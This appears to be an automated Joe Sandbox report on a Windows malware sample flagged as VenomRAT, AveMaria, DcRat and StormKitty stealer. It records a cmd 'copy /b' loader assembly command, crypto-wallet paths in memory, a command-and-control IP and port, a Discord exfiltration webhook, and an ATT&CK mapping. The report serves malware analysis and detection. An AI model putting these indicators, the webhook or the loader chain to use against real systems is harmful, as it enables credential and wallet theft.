                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\solaris + ..\harassment + ..\proudly + ..\turned + ..\viruses + ..\wallpapers + ..\usc + ..\crm + ..\ribbon + ..\confident + ..\angle + ..\alumni + ..\fees + ..\reserve + ..\reflected + ..\include + ..\specialist + ..\respondent + ..\false + ..\assume + ..\regardless + ..\mary + ..\consecutive + ..\movers + ..\scottish + ..\holocaust + ..\experience + ..\phrase + ..\started + ..\disturbed + ..\needle + ..\pipes + ..\hollow + ..\spelling + ..\reed + ..\tft + ..\specialties y
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\solaris + ..\harassment + ..\proudly + ..\turned + ..\viruses + ..\wallpapers + ..\usc + ..\crm + ..\ribbon + ..\confident + ..\angle + ..\alumni + ..\fees + ..\reserve + ..\reflected + ..\include + ..\specialist + ..\respondent + ..\false + ..\assume + ..\regardless + ..\mary + ..\consecutive + ..\movers + ..\scottish + ..\holocaust + ..\experience + ..\phrase + ..\started + ..\disturbed + ..\needle + ..\pipes + ..\hollow + ..\spelling + ..\reed + ..\tft + ..\specialties yJump to behavior
                    Source: Depression.com, 0000000B.00000000.1425761430.00000000010C3000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ProgMan
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd!SHELLDLL_DefView
                    Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager`,
                    Source: RegAsm.exe, 0000000E.00000002.2630405640.000000000373B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.000000000371B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2630405640.00000000036D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeCode function: 0_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00406831
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Lowering of HIPS / PFW / Operating System Security Settings

                    barindex
                    Yara detected VenomRAT
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MSASCui.exe
                    Source: RegAsm.exe, 0000000E.00000002.2633955559.00000000059A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: procexp.exe
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AveMaria stealer
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Yara detected BrowserPasswordDump
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Yara detected DcRat
                    Source: Yara matchFile source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected StormKitty Stealer
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Electrum#\Electrum\wallets
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \bytecoinJaxxk\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus+\Exodus\exodus.wallet
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: exodus
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Coinomi1\Coinomi\Coinomi\wallets
                    Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Ethereum%\Ethereum\keystore
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AveMaria stealer
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Yara detected BrowserPasswordDump
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
                    Yara detected DcRat
                    Source: Yara matchFile source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected StormKitty Stealer
                    Source: Yara matchFile source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		11
                    Input Capture                    		3
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Native API                    		1
                    Scheduled Task/Job                    		212
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		LSASS Memory26
                    System Information Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Command and Scripting Interpreter                    		Logon Script (Windows)1
                    Scheduled Task/Job                    		11
                    Obfuscated Files or Information                    		Security Account Manager1
                    Query Registry                    		SMB/Windows Admin Shares11
                    Input Capture                    		1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts1
                    Scheduled Task/Job                    		Login HookLogin Hook1
                    DLL Side-Loading                    		NTDS241
                    Security Software Discovery                    		Distributed Component Object Model1
                    Clipboard Data                    		1
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
                    Masquerading                    		LSA Secrets3
                    Process Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials151
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items212
                    Process Injection                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573646 Sample: OR8Ti8rf8h.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 48 iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe 2->48 50 time.windows.com 2->50 52 5 other IPs or domains 2->52 60 Suricata IDS alerts for network traffic 2->60 62 Found malware configuration 2->62 64 Malicious sample detected (through community Yara rule) 2->64 66 12 other signatures 2->66 9 OR8Ti8rf8h.exe 59 2->9         started        signatures3 process4 file5 36 C:\Users\user\AppData\Local\Temp\Wallpapers, data 9->36 dropped 38 C:\Users\user\AppData\Local\Temp\Viruses, data 9->38 dropped 40 C:\Users\user\AppData\Local\Temp\Usc, data 9->40 dropped 42 34 other malicious files 9->42 dropped 68 Writes many files with high entropy 9->68 13 cmd.exe 3 9->13         started        signatures6 process7 file8 46 C:\Users\user\AppData\...\Depression.com, PE32 13->46 dropped 78 Drops PE files with a suspicious file extension 13->78 80 Writes many files with high entropy 13->80 17 Depression.com 1 13->17         started        21 cmd.exe 2 13->21         started        23 conhost.exe 13->23         started        25 7 other processes 13->25 signatures9 process10 file11 32 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 17->32 dropped 56 Writes to foreign memory regions 17->56 58 Injects a PE file into a foreign processes 17->58 27 RegAsm.exe 1 3 17->27         started        34 C:\Users\user\AppData\Local\Temp\585711\Y, data 21->34 dropped signatures12 process13 dnsIp14 54 208.115.220.58, 4449, 49843 LIMESTONENETWORKSUS United States 27->54 44 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 27->44 dropped 70 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 27->70 72 Found many strings related to Crypto-Wallets (likely being stolen) 27->72 74 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 27->74 76 Writes many files with high entropy 27->76 file15 signatures16

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    OR8Ti8rf8h.exe21%ReversingLabs

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\585711\Depression.com0%ReversingLabs
                    C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe0%ReversingLabs

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.newtonsoft.com/jsonschema0%Avira URL Cloudsafe
                    http://ocsp.sectigo.com0D0%Avira URL Cloudsafe
                    http://www.softland.ro0/0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    bg.microsoft.map.fastly.net
                    		199.232.214.172
                    		truefalse
                      		high
                      s-part-0035.t-0009.t-msedge.net
                      		13.107.246.63
                      		truefalse
                        		high
                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        		217.20.58.100
                        		truefalse
                          		high
                          time.windows.com
                          		unknown
                          		unknownfalse
                            		high
                            iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe
                            		unknown
                            		unknowntrue
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0OR8Ti8rf8h.exefalse
                                		high
                                https://sectigo.com/CPS0OR8Ti8rf8h.exefalse
                                  		high
                                  http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#OR8Ti8rf8h.exefalse
                                    		high
                                    http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0OR8Ti8rf8h.exefalse
                                      		high
                                      http://ocsp.sectigo.com0OR8Ti8rf8h.exefalse
                                        		high
                                        http://www.softland.ro0/OR8Ti8rf8h.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://discordapp.com/api/v6/users/RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#OR8Ti8rf8h.exefalse
                                            		high
                                            http://www.autoitscript.com/autoit3/XDepression.com, 0000000B.00000000.1425868665.00000000010D5000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.drfalse
                                              		high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#OR8Ti8rf8h.exefalse
                                                		high
                                                http://nsis.sf.net/NSIS_ErrorErrorOR8Ti8rf8h.exefalse
                                                  		high
                                                  https://www.autoitscript.com/autoit3/Depression.com.2.dr, Ada.0.drfalse
                                                    		high
                                                    https://urn.to/r/sds_seeaCouldRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://james.newtonking.com/projects/jsonRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.newtonsoft.com/jsonschemaRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0OR8Ti8rf8h.exefalse
                                                          		high
                                                          https://stackoverflow.com/q/14436606/23354cItRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://ipinfo.io/ipRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://github.com/LimerBoy/StormKittyRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://stackoverflow.com/q/11564914/23354;RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://stackoverflow.com/q/2152978/23354RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zOR8Ti8rf8h.exefalse
                                                                      		high
                                                                      https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://urn.to/r/sds_seeRegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#OR8Ti8rf8h.exefalse
                                                                              		high
                                                                              http://ocsp.sectigo.com0DOR8Ti8rf8h.exefalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              208.115.220.58
                                                                              		unknownUnited States
                                                                              		46475LIMESTONENETWORKSUStrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1573646
                                                                              Start date and time:2024-12-12 12:37:06 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 6m 40s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:18
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:OR8Ti8rf8h.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.rans.troj.spyw.evad.winEXE@24/54@2/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 74
                                                                              • Number of non-executed functions: 41
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 40.81.94.65, 217.20.58.100, 13.107.246.63, 4.245.163.56
                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, twc.trafficmanager.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                              • VT rate limit hit for: OR8Ti8rf8h.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              06:38:12API Interceptor1x Sleep call for process: OR8Ti8rf8h.exe modified
                                                                              06:38:55API Interceptor9x Sleep call for process: Depression.com modified
                                                                              06:39:18API Interceptor17x Sleep call for process: RegAsm.exe modified

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              s-part-0035.t-0009.t-msedge.nethttps://www.google.cv/url?duf=FbLLcAJXWZoeUZJIjST2&lfg=uVQGQao2QJuMH6TEkmpq&sa=t&fmc=XCKeeJBBTaVsgNFTQcDe&url=amp%2Fshairmylife.com%2Fkam%2FOATWMWQPC27P047EIPR32X/YWxpc29ub0B0aG9ydWsuY29tGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              setup (2).msiGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              DocScan_20242175.jsGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              setup.msiGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              Non_disclosure_agreement.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                              • 13.107.246.63
                                                                              http://get-derila.comGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              Event Schedule.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              DHL AWB Document_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              malware.ps1Get hashmaliciousUnknownBrowse
                                                                              • 13.107.246.63
                                                                              bg.microsoft.map.fastly.netHvASs4SYK9.exeGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Rockwool-Msg-S9039587897.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                              • 199.232.210.172
                                                                              financial_policy_December 10, 2024.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                              • 199.232.214.172
                                                                              RQ--029.msiGet hashmaliciousAteraAgentBrowse
                                                                              • 199.232.210.172
                                                                              DHL AWB Document_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                              • 199.232.214.172
                                                                              Purchase_order-001.pdfGet hashmaliciousUnknownBrowse
                                                                              • 199.232.210.172
                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 199.232.210.172
                                                                              MHDeXPq2uB.exeGet hashmaliciousRedLineBrowse
                                                                              • 199.232.210.172
                                                                              n70CrSGL8G.exeGet hashmaliciousRedLineBrowse
                                                                              • 199.232.214.172
                                                                              1.eGet hashmaliciousDanaBotBrowse
                                                                              • 199.232.210.172
                                                                              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comEvent Schedule.xlsxGet hashmaliciousUnknownBrowse
                                                                              • 217.20.58.100
                                                                              Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                              • 217.20.58.98
                                                                              Tyler_In service Agreement889889.pdfGet hashmaliciousUnknownBrowse
                                                                              • 217.20.58.101
                                                                              https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnkGet hashmaliciousUnknownBrowse
                                                                              • 84.201.211.22
                                                                              Employee_Letter.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                              • 217.20.58.99
                                                                              Carisls Open Benefits Enrollment.emlGet hashmaliciousunknownBrowse
                                                                              • 217.20.58.101
                                                                              Ou1b9NGTq8.dllGet hashmaliciousUnknownBrowse
                                                                              • 217.20.58.98
                                                                              CID5B21A97B8635.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                              • 217.20.58.101
                                                                              FG Or#U00e7amento JAN 2025.pdfGet hashmaliciousUnknownBrowse
                                                                              • 217.20.58.98
                                                                              Stonhard Response Required 10 Dec, 2024- 0PH8-NYFV0C-ZDU7.msgGet hashmaliciousUnknownBrowse
                                                                              • 217.20.57.24

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              LIMESTONENETWORKSUShax.spc.elfGet hashmaliciousMiraiBrowse
                                                                              • 192.169.92.229
                                                                              DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                              • 208.115.225.220
                                                                              SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                              • 208.115.225.220
                                                                              Banco Santander Totta _Aconselhamento_Pagamento.imgGet hashmaliciousRemcosBrowse
                                                                              • 64.31.43.234
                                                                              Qp4Oxj7MFr.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234
                                                                              eL4Cy6oGvv.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234
                                                                              Qp4Oxj7MFr.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234
                                                                              eL4Cy6oGvv.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234
                                                                              kVwZX19J2X.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234
                                                                              kVwZX19J2X.exeGet hashmaliciousUnknownBrowse
                                                                              • 64.31.43.234

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\585711\Depression.comnanophanotool.exeGet hashmaliciousLummaC StealerBrowse
                                                                                5y2VCFOB05.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                  5y2VCFOB05.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                    PQwHxAiBGt.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                          SeT_up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            Setup.exeGet hashmaliciousLummaCBrowse

                                                                                              Created / dropped Files

